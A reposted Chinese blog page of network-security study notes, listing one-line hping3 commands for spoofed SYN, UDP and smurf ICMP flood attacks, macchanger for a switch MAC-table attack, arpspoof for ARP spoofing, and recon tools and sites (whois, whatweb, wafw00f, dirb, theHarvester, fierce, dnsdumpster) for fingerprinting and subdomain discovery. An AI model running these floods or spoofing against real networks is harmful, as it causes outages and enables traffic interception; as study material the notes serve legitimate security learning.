当前位置:   article > 正文

网络安全知识点梳理(二)_11.通过dns注册信息获取子域名

11.通过dns注册信息获取子域名

信息收集

  • DOS攻击

hping3 -q -S -n --rand-source -p 80 --flood ip                           //TCP

hping3 -q -n -a 1.1.1.1 --udp -s 53 -p 80 --flood ip -d 1000   //udp

hping3 --icmp -c 1 --spoof 192.168.0.111 192.168.0.255     //smurf icmp

macchanger -e -a eth0    //交换机地址表攻击

  • 欺骗

arpspoof -i eth0 -t ip ip  //arp 欺骗

  • 定义

网站指纹:网站系统名称和版本;广义上包括网站,中间件,操作系统的版本信息。

  • 信息收集

1命令

whois url 收集域名信息

whatweb url   扫描网站指纹

wafw00f url

dirb url

theHarvester -d url -b 搜索引擎

fierce --domain url  //通过dns注册信息获得子域名

2网址:

ping.chinaz.com           //判断是否有cdn 获得ip

dnsdumpster.com       //通过dns注册信息获得子域名

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/525661
推荐阅读
相关标签
  

闽ICP备14008679号